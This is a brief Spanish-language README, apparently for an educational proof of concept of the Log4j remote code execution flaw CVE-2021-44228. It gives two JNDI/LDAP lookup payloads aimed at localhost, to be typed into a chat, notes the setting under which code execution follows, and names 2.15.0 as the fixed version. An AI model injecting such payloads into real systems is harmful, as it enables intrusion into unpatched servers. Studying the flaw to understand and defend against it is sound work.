
Log4j-RCE (CVE-2021-44228) Prueba de concepto con información adicional
Esta es una prueba de concepto del RCE de log4j.
Aquí hay algunos enlaces sobre el CVE-2021-44228:
Este fallo afecta a casi todas las versiones de log4j2 y quizás a las de log4j1. La versión recomendada es 2.15.0, que corrige la explotación.
${jndi:ldap://127.0.0.1/e} en el chat. Si hay un socket abierto en el puerto 389, logj4 intenta conectarse y bloquea la comunicación posterior hasta que se produce un timeout.THIS IS SEND TO THE LOG!!! LOG4J EXPLOIT!, que es un objeto de cadena serializado del servidor LDAP.
${jndi:ldap://127.0.0.1/exe} en el chat. Si -Dcom.sun.jndi.ldap.object.trustURLCodebase=true está configurado en true, se producirá la ejecución remota de código.
Este proyecto es solo con fines educativos.